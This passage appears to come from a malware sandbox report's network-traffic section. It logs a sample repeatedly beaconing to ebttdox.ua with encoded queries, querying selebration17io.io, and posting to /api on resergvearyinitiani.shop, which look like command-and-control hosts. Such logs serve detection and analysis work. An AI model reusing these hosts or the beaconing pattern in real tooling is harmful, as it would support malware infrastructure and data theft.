                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929f3a HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: unknown | DNS traffic detected: queries for: selebration17io.io
                  Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: resergvearyinitiani.shop
                  Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Thu, 08 Feb 2024 18:07:52 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: keep-alive | Data Raw: 37 0d 0a 03 00 00 00 1f 3d 52 0d 0a 30 0d 0a 0d 0a | Data Ascii: 7=R0
                  Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Thu, 08 Feb 2024 18:07:53 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: keep-alive | Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
                  Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Thu, 08 Feb 2024 18:07:53 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: keep-alive
